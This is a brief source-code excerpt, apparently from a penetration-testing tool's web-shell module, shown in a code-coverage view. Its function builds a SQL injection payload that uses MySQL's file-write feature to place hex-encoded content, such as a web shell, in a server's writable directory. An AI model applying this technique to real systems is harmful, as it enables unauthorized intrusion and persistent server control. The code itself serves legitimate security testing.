(self, fileContent, fileName, directory)
| 146 | return False |
| 147 | |
| 148 | def _webFileInject(self, fileContent, fileName, directory): |
| 149 | outFile = posixpath.join(ntToPosixSlashes(directory), fileName) |
| 150 | uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) |
| 151 | query = "" |
| 152 | |
| 153 | if isTechniqueAvailable(getTechnique()): |
| 154 | where = getTechniqueData().where |
| 155 | |
| 156 | if where == PAYLOAD.WHERE.NEGATIVE: |
| 157 | randInt = randomInt() |
| 158 | query += "OR %d=%d " % (randInt, randInt) |
| 159 | |
| 160 | query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=encodeHex(uplQuery, binary=False)) |
| 161 | query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) |
| 162 | payload = agent.payload(newValue=query) |
| 163 | page = Request.queryPage(payload) |
| 164 | |
| 165 | return page |
| 166 | |
| 167 | def webInit(self): |
| 168 | """ |
no test coverage detected